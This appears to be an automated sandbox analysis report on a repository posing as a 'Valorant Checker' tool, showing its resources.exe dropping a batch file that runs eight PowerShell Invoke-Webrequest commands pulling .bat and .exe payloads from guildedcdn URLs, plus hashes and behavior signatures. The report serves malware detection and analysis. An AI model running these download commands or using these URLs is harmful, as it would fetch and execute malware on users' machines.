Overview
overview
10Static
static
3Valorant-C...er.exe
windows11-21h2-x64
7Valorant-C...ker.py
windows11-21h2-x64
3Valorant-C...le.exe
windows11-21h2-x64
8Valorant-C...up.bat
windows11-21h2-x64
1Valorant-C...CSS.py
windows11-21h2-x64
3Valorant-C...uth.py
windows11-21h2-x64
3Valorant-C...bot.py
windows11-21h2-x64
3Valorant-C...eck.py
windows11-21h2-x64
3Valorant-C...ker.py
windows11-21h2-x64
3Valorant-C...ers.py
windows11-21h2-x64
3Valorant-C...ata.py
windows11-21h2-x64
3Valorant-C...eck.py
windows11-21h2-x64
3Valorant-C...ll.bat
windows11-21h2-x64
1Valorant-C...ain.py
windows11-21h2-x64
3Valorant-C...inn.py
windows11-21h2-x64
3Valorant-C...es.exe
windows11-21h2-x64
8Valorant-C...uff.py
windows11-21h2-x64
3Valorant-C...ems.py
windows11-21h2-x64
3Valorant-C...trs.py
windows11-21h2-x64
3Valorant-C...ort.py
windows11-21h2-x64
3Valorant-C...ul.cmd
windows11-21h2-x64
8Valorant-C...rt.bat
windows11-21h2-x64
1Valorant-C...er.bat
windows11-21h2-x64
10Valorant-C...mpy.py
windows11-21h2-x64
3Valorant-C...sw.exe
windows11-21h2-x64
7Valorant-C.../sw.py
windows11-21h2-x64
3Valorant-C...cmp.py
windows11-21h2-x64
3Analysis
-
max time kernel
146s -
max time network
159s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
24/02/2024, 11:30
Behavioral task
behavioral1
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/checker.exe
Resource
win11-20240221-en
Behavioral task
behavioral2
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/checker.py
Resource
win11-20240221-en
Behavioral task
behavioral3
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/checkmodule.exe
Resource
win11-20240221-en
Behavioral task
behavioral4
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/chsetup.bat
Resource
win11-20240221-en
Behavioral task
behavioral5
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/PCSS.py
Resource
win11-20240221-en
Behavioral task
behavioral6
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/auth.py
Resource
win11-20240221-en
Behavioral task
behavioral7
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/bot.py
Resource
win11-20240221-en
Behavioral task
behavioral8
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/check.py
Resource
win11-20240221-en
Behavioral task
behavioral9
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/checker.py
Resource
win11-20240221-en
Behavioral task
behavioral10
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/checkers.py
Resource
win11-20240221-en
Behavioral task
behavioral11
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/data.py
Resource
win11-20240221-en
Behavioral task
behavioral12
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/fastcheck.py
Resource
win11-20240221-en
Behavioral task
behavioral13
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/install.bat
Resource
win11-20240221-en
Behavioral task
behavioral14
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/main.py
Resource
win11-20240221-en
Behavioral task
behavioral15
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/mainn.py
Resource
win11-20240221-en
Behavioral task
behavioral16
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/resources.exe
Resource
win11-20240221-en
Behavioral task
behavioral17
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/stuff.py
Resource
win11-20240221-en
Behavioral task
behavioral18
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/systems.py
Resource
win11-20240221-en
Behavioral task
behavioral19
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/trs.py
Resource
win11-20240221-en
Behavioral task
behavioral20
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/validsort.py
Resource
win11-20240221-en
Behavioral task
behavioral21
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/smmmodul.cmd
Resource
win11-20240221-en
Behavioral task
behavioral22
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/start.bat
Resource
win11-20240221-en
Behavioral task
behavioral23
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/updater.bat
Resource
win11-20240221-en
Behavioral task
behavioral24
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/vacwcbmpy.py
Resource
win11-20240221-en
Behavioral task
behavioral25
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/valorchksw/sw.exe
Resource
win11-20240221-en
Behavioral task
behavioral26
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/valorchksw/sw.py
Resource
win11-20240221-en
Behavioral task
behavioral27
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/vcmp.py
Resource
win11-20240221-en
General
-
Target
Valorant-Checker-Fast-Api-main/Valorant Checker/py/resources.exe
-
Size
65KB
-
MD5
45a75aa481a7148a837086f41798e847
-
SHA1
9a22f26b76ac3813f1130c4d29a11dc1179b05cb
-
SHA256
5843142659449503fcb25e25c423d3d42be85d4865b1c0373e1442e118e3e509
-
SHA512
bc8389f0544956921daff9267c2c783329bb134aba67afe360bbce794ade3820930f3fc40a055daab9eae015d27274c44b1a989a8ea257550b0df26351ceff05
-
SSDEEP
1536:l1jpfHn5T82s45tlDqwIdvKKBLutvfFoV/XUuP:lvfH5TZsYnjIdbCNNoV/Xh
Malware Config
Signatures
-
Blocklisted process makes network request 8 IoCs
flow pid Process 2 3864 powershell.exe 4 424 powershell.exe 5 72 powershell.exe 6 2288 powershell.exe 7 4004 powershell.exe 8 1404 powershell.exe 9 1040 powershell.exe 10 2340 powershell.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 3780 timeout.exe 3856 timeout.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 3864 powershell.exe 3864 powershell.exe 424 powershell.exe 424 powershell.exe 72 powershell.exe 72 powershell.exe 2288 powershell.exe 2288 powershell.exe 4004 powershell.exe 4004 powershell.exe 1404 powershell.exe 1404 powershell.exe 1040 powershell.exe 1040 powershell.exe 2340 powershell.exe 2340 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 3864 powershell.exe Token: SeDebugPrivilege 424 powershell.exe Token: SeDebugPrivilege 72 powershell.exe Token: SeDebugPrivilege 2288 powershell.exe Token: SeDebugPrivilege 4004 powershell.exe Token: SeDebugPrivilege 1404 powershell.exe Token: SeDebugPrivilege 1040 powershell.exe Token: SeDebugPrivilege 2340 powershell.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 4736 wrote to memory of 4272 4736 resources.exe 77 PID 4736 wrote to memory of 4272 4736 resources.exe 77 PID 4736 wrote to memory of 4272 4736 resources.exe 77 PID 4272 wrote to memory of 3864 4272 cmd.exe 79 PID 4272 wrote to memory of 3864 4272 cmd.exe 79 PID 4272 wrote to memory of 3864 4272 cmd.exe 79 PID 4272 wrote to memory of 424 4272 cmd.exe 80 PID 4272 wrote to memory of 424 4272 cmd.exe 80 PID 4272 wrote to memory of 424 4272 cmd.exe 80 PID 4272 wrote to memory of 72 4272 cmd.exe 81 PID 4272 wrote to memory of 72 4272 cmd.exe 81 PID 4272 wrote to memory of 72 4272 cmd.exe 81 PID 4272 wrote to memory of 2288 4272 cmd.exe 82 PID 4272 wrote to memory of 2288 4272 cmd.exe 82 PID 4272 wrote to memory of 2288 4272 cmd.exe 82 PID 4272 wrote to memory of 4004 4272 cmd.exe 83 PID 4272 wrote to memory of 4004 4272 cmd.exe 83 PID 4272 wrote to memory of 4004 4272 cmd.exe 83 PID 4272 wrote to memory of 1404 4272 cmd.exe 84 PID 4272 wrote to memory of 1404 4272 cmd.exe 84 PID 4272 wrote to memory of 1404 4272 cmd.exe 84 PID 4272 wrote to memory of 3856 4272 cmd.exe 85 PID 4272 wrote to memory of 3856 4272 cmd.exe 85 PID 4272 wrote to memory of 3856 4272 cmd.exe 85 PID 4272 wrote to memory of 1040 4272 cmd.exe 86 PID 4272 wrote to memory of 1040 4272 cmd.exe 86 PID 4272 wrote to memory of 1040 4272 cmd.exe 86 PID 4272 wrote to memory of 3780 4272 cmd.exe 87 PID 4272 wrote to memory of 3780 4272 cmd.exe 87 PID 4272 wrote to memory of 3780 4272 cmd.exe 87 PID 4272 wrote to memory of 2340 4272 cmd.exe 88 PID 4272 wrote to memory of 2340 4272 cmd.exe 88 PID 4272 wrote to memory of 2340 4272 cmd.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\Valorant-Checker-Fast-Api-main\Valorant Checker\py\resources.exe"C:\Users\Admin\AppData\Local\Temp\Valorant-Checker-Fast-Api-main\Valorant Checker\py\resources.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\d59630ce-fee0-4f57-bf10-6f82ed979f6f.bat2⤵
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3864
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:424
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:72
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4004
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1404
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 23⤵
- Delays execution with timeout.exe
PID:3856
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1040
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 83⤵
- Delays execution with timeout.exe
PID:3780
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5c0636f2d138baca01dbb2eedb99bf3d5
SHA13b927899db0f3e2cb510782592887dc02fc3e400
SHA25610973e727e5b0eb3f12aba60a682d66e79dfd86e4b6cfc454fd8df70c6e1fa8a
SHA5120187a6ccb6428fb24ad4bc4ca14e7ce6f40ae6ca4f352f8e86a15288deb05cb4dd317ef8e9d04dc9ffb24407ecf0924af2c7910830c79366f7e4e48cb4b82b1d
-
Filesize
18KB
MD54d3ae3880501aec037c25ec8cdeb6fde
SHA1386bd6e78571dd445e34da0a66bd0f320e08e42b
SHA256bc6830ed2f131c53aadf6ec18d6f2f5214964fe21d4faf180ff6a054f119c28a
SHA512bf371fa6ec11fdd37c14bba1e24dd43312e68c0e34a46edb6250efed0c479d2aed4131736a35ea7ebc0f82e367cb3271dc3bc3556a787e3229784b7182f882af
-
Filesize
18KB
MD5aa4c97e649e9be023546bb5ca969b0b6
SHA1fdbfbd329aa4569a7a6c003c4b1782f2c0030092
SHA2567864ef2a9b300f36a5ed0a703219cf425994cc1a0ca0be4de9356fb846b3db55
SHA5125fdf12214cc17a41aeea2ecabf30a6a94f6a62901638d111e2cc8af3777b1cd858322f499512dba4029022b687e279a1fad43e1ba2ccc4380299895290aab5f2
-
Filesize
18KB
MD58617bbb4a78e3f7849b645660916d4a3
SHA15c445ffd3e0986674c79043da16905ed86807cc9
SHA256705d888d7ba4bfa19339d418266d5d5f28dfbdb210cf624f5a3084eb5ae11952
SHA512b9540959c519428cbc68d171a247af881ae32389c8d5f7754c3f2163091570c827d4c1987c226344994019d372c8428a847cdd84c6e0eca55a0d18580d481662
-
Filesize
18KB
MD5cbc3d2e92f9928ba86266c6e411d1c46
SHA1cc8fc4c8e45ca1eeeaba7e05fd344ef040333358
SHA256d2d0081f7e40f9dc359a6b85bd09515d7f8779a37511e3607904a4856efe188a
SHA512549e14a0c67e5938794c9a5bad7c1f998e1970d4bcb029cb7afa86e30750cd7df220dea50e6f4b3809a95d988298a77e754eb97fe2dbf99ae4fc65dd2ee2aae6
-
Filesize
18KB
MD5138951381e66e074170c8473c8a66d83
SHA136e3c4fd8782f0b663d85d2b6eda232d47750230
SHA256b363fac630649f7e43f00f628122cc748c45112aef3edf19abcce133a041a4cc
SHA512bbec3a3b0ef8fa38bcfbac4a97f38c166a7c13b35545992e7789f381b7e08f4e1c3a0dfc5387e3fcfd9144bbce346ffabbdc664d5e1f256af949f09551844243
-
Filesize
18KB
MD56665ec1c16cf5db6aab5991bf7d4fae7
SHA176755129f6ff23cb106726de4295a204f55dc144
SHA256c1196ec4143dc19051bf5abe23f8ecec03ad4435655ecfa51a7d0f86b422bc82
SHA512e81c5a080b6864cff3745346d54845d93d1286be4a8dd1e73b61d846cb8996d6b3539bfce8915543e4c8e1e494cbd896c5762229c0f799f3f7025693c7ce226b
-
Filesize
18KB
MD5eb91f18a259fbee8740ae89dc9d504a5
SHA1734a13e4fa4286996baa3f04f9c0080642c8c4f0
SHA256ec35caf30fb62d5b5a5f932a20ba5abadae7ce61ff76522d13dd968305d16349
SHA512a064fbcf5e2e988d9d85f17e19ead6f4810cc393389c594440efcbbca3a5e2a4fae3734b2255d4d3a0bfe86877952ab511930151f47515f9db4af16b2ffdad3d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5d0cec99ca3a717c587689ebf399662c4
SHA11d4bbaf8079912ada46a6fa8693d8c20d5ec5b66
SHA256b1ae110ef84ecec90a75742ca29adc0704b67abe8f093aa5a959ea0864766228
SHA51299b21193db6615a33eb738c246229e9a7efcaf03fcab24654d67680396155a0c62cbc834078687d75d1892b1708383eafeda4f87e86b33bd827b18bc988122f7